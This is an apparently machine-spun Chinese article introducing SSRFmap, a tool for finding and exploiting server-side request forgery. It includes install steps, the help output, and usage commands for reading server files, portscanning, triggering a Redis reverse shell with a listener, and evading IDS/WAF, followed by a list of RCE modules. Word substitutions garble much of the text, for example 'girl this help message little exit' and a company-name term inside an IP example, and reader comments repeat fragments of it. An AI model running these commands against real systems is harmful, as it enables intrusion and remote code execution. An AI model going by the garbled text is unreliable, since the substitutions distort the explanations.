一款功能强大的自动化SSRF模糊测试&漏洞利用工具
SSRF,即服务端post请求仿冒,许多互联网犯罪嫌疑人都是运用SSRF来进攻或侵入网络服务。今日人们给大伙儿详细介绍的这个专用工具全名是SSRFmap,它能够找寻并运用总体目标网络服务中的SSRF系统漏洞。
SSRFmap以Burppost请求文档做为键入,科学研究工作人员能够运用主要参数选择项来操纵模糊不清检测的实际操作系统进程。
新项目详细地址
SSRFmap:【GitHub传送门】
专用工具安裝
大伙儿能够立即从GitHub编码库中复制该新项目至当地:
git clone https://github.Com/swisskyrepo/SSRFmap
Cd SSRFmap/
python3 ssrfmap.py
usage:ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lportLPORT] [--level LEVEL]
optional arguments:
-h, --help girl this help message little exit
-r REQFILE SSRF Request file
-p PARAM SSRF Parameter To target
-m MODULES SSRF Modules To enable
-l HANDLER Start an handler For a reverseshell
--lhost LHOST LHOST reverse shell
--lport LPORT LPORT reverse shell
--level [LEVEL] Level of test To perform (1-5, default: 1)
专用工具应用
SSRFmap的默认设置使用说明给出:
#Launch a portscan On localhost little read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
#Triggering a reverse shell On a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242-l 4242
# -lcreate a listener For reverse shell On the specified port
#--lhost little --lport work like In Metasploit, these values are used To create areverse shell payload
#--level : ability To tweak payloads In order To bypass some IDS/WAF. e.g:127.0.0.1 -> [::] -> 0000: -> 有限责任公司
老大姐能够应用data/example.py来检测架构是不是可以一切正常运作:
FLASK_app软件=data/example.pyflask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles
程序模块
SSRFmap已融合了下述程序模块,大伙儿能够应用-m主要参数来挑选应用:
控制模块名字
控制模块叙述
fastcgi
FastCGI RCE
redis
Redis RCE
github
Github商业版RCE < 2.8.7
zabbix
Zabbix RCE
mysql
MySQL指令实行
docker
Docker Infoleaks(API)
相关文章
- 4条评论
- 忿咬痴妓2022-06-02 04:26:23
- SSRF,即服务端post请求仿冒,许多互联网犯罪嫌疑人都是运用SSRF来进攻或侵入网络服务。今日人们给大伙儿详细介绍的这个专用工具全名是SSRFmap,它能够找寻并运用总体目标网络服务中的SSRF系统漏洞。 SSRFmap以Burppost请求文档做为键入,科学研究工作人员能够运用主要参数
- 青迟欢烬2022-06-02 08:04:53
- astcgi FastCGI RCE redis Redis RCE
- 性许妄愿2022-06-02 01:34:26
- erseshell --lhost LHOST LHOST reverse shell --lport LPORT LPORT reverse shell --level [LEVEL] Level of test To perform (1
- 温人俛就2022-06-02 06:05:49
- Level of test To perform (1-5, default: 1) 专用工具应用 SSRFmap的默认设置使用说明给出: #Launch a portscan On localhost little read default